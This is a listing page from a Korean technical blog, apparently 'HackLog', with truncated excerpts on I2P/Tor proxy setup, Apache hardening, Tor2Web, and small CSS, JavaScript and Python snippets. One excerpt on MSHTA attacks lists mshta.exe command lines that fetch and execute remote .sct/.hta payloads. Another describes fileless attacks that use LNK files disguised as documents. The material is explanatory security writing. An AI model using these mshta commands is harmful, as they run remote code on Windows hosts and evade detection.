728x90 분류 전체보기720 프라이버시 - Tor 브라우저에서 I2P 사용하기 1. FoxyProxy 확장 기능을 설치 FoxyProxy를 설치해준다. 만약 FoxyProxy를 설치했는데도 브라우저 도구 모음에 표시가 안되면 "도구 모음 사용자 지정(C)"에서 보이게 설정 2. FoxyProxy 설정 I2P 프록시를 새로 생성 Proxy Type: HTTP Proxy IP address: 127.0.0.1 Port: 4444 3. I2P 프록시 패턴 설정 I2P는 아웃프록시가 TOR 보다는 적기 때문에 프라이버시 보호(차단 당하기 쉬움)가 떨어진다고 한다. 그러므로 클리어넷에서는 알아서 비활성화를 하고 .i2p 주소에서만 활성화하게 설정을 해야 한다. 방금 생성해 준 I2P에 "Patterns"를 누른다. 패턴을 수정한다. Pattern: *.*.i2p 확장 도구에서 "Use En.. 2023. 2. 11. 프라이버시 - 윈도우 I2P, TOR 프록시 접속기 enableI2PProxy.bat reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d http=127.0.0.1:4444;https=127.0.0.1:4444;ftp=127.0.0.1:4444;socks=127.0.0.1:4444 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v Pro.. 2023. 2. 10. 윈도우 - 파워쉘로 바탕화면 스크린샷 캡처 [Reflection.Assembly]::LoadWithPartialName("System.Drawing") function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose() } $bounds = [Drawing.Rectangle]::Fro.. 2023. 2. 8. 아파치 - 포트 변경하기 sudo vim etc/apache2/ports.conf Listen 80 부분을 수정합니다. 2023. 2. 8. 시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격 command-line mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")")) mshta.exe http://127.0.0.1:4444/payload.hta mshta.exe \\127.0.0.1\folder\payload.hta payload.hta (SCT payloads) 결과 HTA(HTML Application) 보는 것처럼 윈도우에 기본적으로 설치된 mshta.exe(Microsoft HTML Application)는 마치 웹 브라우저처럼 외부에 있는 웹 페이지를 요청하는 기능을 가지고 있다. 여기서 문제점은 여기에 내장된 브라우저가 인터넷 익스플로러 기반인지 ActiveXObject.. 2023. 2. 7. 시스템 보안 - 실행 파일이 없는 우회 기법(파일리스 공격) "파일리스"라는 용어는 컴퓨터의 메모리에만 있는 백도어와 같은 위협이 파일에 제공되지 않음을 시사합니다. 파일리스 기법은 공격이 탐지되지 않거나 추적이 힘들다. 기본적으로 악성코드가 디스크에 파일 형태로 존재하지 않아 스캔 대상이 되지가 않는다. 2016년도부터 파워쉘이 활용이 된 파일리스 공격이 증가세를 보였다. 예제 1) LNK 파일을 이용한 파워셸 원 라이너 실행 화면에 clickme라는 이름의 문서 파일처럼 보이는 파일은 사실 LNK 파일이다. 파일의 속성을 살펴보면 파워셸이 실행되도록 등록돼 있는 것을 볼 수 있는데, 에디터를 이용해 파일의 내용을 자세히 살펴보면, 파워셸 원 라이너라는 것을 알 수 있다. [그림 7] clickme 문서로 보이는 LNK 파일 예제 2) 엑셀을 이용한 파워셸 원 .. 2023. 2. 7. 아파치 - 아파치 서버 정보(버전, OS 정보, 아이피 숨기기) Simple: sudo nano /etc/apache2/conf-enabled/security.conf Then: change ServerTokens OS to ServerTokens Prod change ServerSignature On to ServerSignature Off Restart Apache : sudo service apache2 restart ServerTokens Prod[uctOnly] # 웹서버 종류만 ServerTokens Min[imal] # 웹서버 종류 및 최소 정보 ServerTokens OS # 웹서버 종류 및 OS 정보 ServerTokens Full # 웹서버 종류, OS 정보 및 설치된 모듈 정보 ServerSignature Off # 웹 서버 시그니처 정보(이메일,.. 2023. 2. 6. 아파치 - 아파치 디렉토리 리스팅 방지하기 설정 파일 경로 sudo vim /etc/apache2/apache2.conf (Options 지시자에 Indexes를 제거) Options FollowSymLinks AllowOverride None Require all granted 서비스 재시작 sudo service apache2 restart 결과 2023. 2. 6. 다크넷 - Tor2Web Tor 프록시로만 접속할 수 있는 .onion 주소들을 프록시도 없이 접근할 수 있게 하는 프로젝트이다. 사용 방법 사용 방법은 간단한데 .onion 주소로 된 어니언 주소 뒤에다 Tor2Web의 최상위 도메인 주소를 넣어주면 된다. 예시) abc123.onion -> abc123.onion.pet abc123.onion -> abc123.onion.to 원리 어떤 원리냐면, Tor2Web을 운영하는 단체가 onion이라는 도메인 이름을 산다. (onion.to 이런 도메인을 구매 함) 위 주소 앞에다 문자열을 넣으면 그건 호스트 주소가 됨 ex) abc123.onion.to 그럼 Tor2Web 서버가 실제 abc123.onion이라는 어니언 서버 주소에 접속을 해서 그 사이트 내용을 가져와 일반 브라우.. 2023. 2. 6. CSS - :before를 이용한 채팅창 말풍선 꼬리 만들기 .parent { height: 20px; width: 100px; background-color: #080; position: relative; } .child { position: absolute; width: 80px; height: 200px; background-color: #008; left: 50%; /* note 50% */ top: 30px; margin-left: -20px; /* 2x your arrow size */ } .child:before { position: absolute; border-right: 10px solid transparent; border-bottom: 10px solid #008; border-left: 10px solid transparent; top: -.. 2023. 2. 5. 자바스크립트 - 브라우저 탭이 활성화인지 확인하기(document.hidden) if (document.hidden) console.log('비활성화'); else console.log('활성화'); 출처: https://stackoverflow.com/questions/1760250/how-to-tell-if-browser-tab-is-active How to tell if browser/tab is active Possible Duplicate: Is there a way to detect if a browser window is not currently active? I have a function that is called every second that I only want to run if the current page is in the stackoverflow.com 2023. 2. 5. 파이썬 - 세션 만료 시간 검증하기 from datetime import timedelta, datetime session_lifetime = timedelta(seconds=10) # 세션 유지 시간 expired_time = datetime.now() + session_lifetime if expired_time < datetime.now(): print("세션 사용 기간이 만료됨.") 2023. 2. 3. 이전 1 ··· 22 23 24 25 26 27 28 ··· 60 다음 728x90
HackLog
